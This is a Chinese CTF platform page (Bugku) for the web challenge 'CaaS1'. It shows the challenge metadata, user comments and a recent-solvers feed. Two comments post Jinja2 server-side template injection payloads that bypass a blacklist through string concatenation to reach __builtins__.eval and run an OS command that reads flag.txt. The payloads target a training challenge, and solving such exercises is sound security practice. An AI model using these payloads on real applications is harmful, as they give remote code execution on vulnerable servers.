CaaS1 - Bugku CTF平台

CaaS1WEB 未解决

分数: 40 金币: 4

题目作者: Aman

一　　血: Paradiso

一血奖励: 4金币

解　　决: 123

提　　示:

描　　述:

CaaS1

其　　他: server.zip

评论

124要留就要77 6月前

举报

name={{g.pop["__global""s__"].__builtins__.eval(request.form.team_name)}}&team_name=__import__("os").popen("cat flag.txt").read() 直接获取flag

回复 1

baozongwi 1年前

举报

会不会出题大哥，这黑名单里面有[]为什么这样子还能过 name={{g.pop["__global""s__"].__builtins__.eval(request.args.x)}}&team_name=g 怎么回事

回复 0

网络小钦 1年前

举报

看不懂啊

回复 0

2552758573 1年前

举报

payload太长了，绕不过去

回复 0

无法释怀的遗憾en 2年前

举报

这个题什么意思

回复 0

无法释怀的遗憾en 1年前

举报

@cgxx 懂了好玩这个题

回复 0

cgxx 2年前

举报

模板注入

回复 0

WriteUp

vchopin

2 金币

立即查看

评分(1)

解题动态

刘德龙攻破了该题 5小时前

叶子璐攻破了该题 5小时前

农群丹攻破了该题 7小时前

杨荣涛攻破了该题 7小时前

05su 攻破了该题 18小时前

xz6666 攻破了该题 1天前

螺蛳粉攻破了该题 1天前

金典攻破了该题 1天前

特仑苏攻破了该题 1天前

韦东妙攻破了该题 1天前

陆美宏攻破了该题 1天前

严晓颖攻破了该题 1天前

卢思杏攻破了该题 1天前

杨节攻破了该题 1天前

覃晴韵攻破了该题 1天前

0622 攻破了该题 1天前

刘丽华攻破了该题 1天前

HHHHYY 攻破了该题 1天前

何林凤攻破了该题 1天前

黄萌攻破了该题 1天前

问题反馈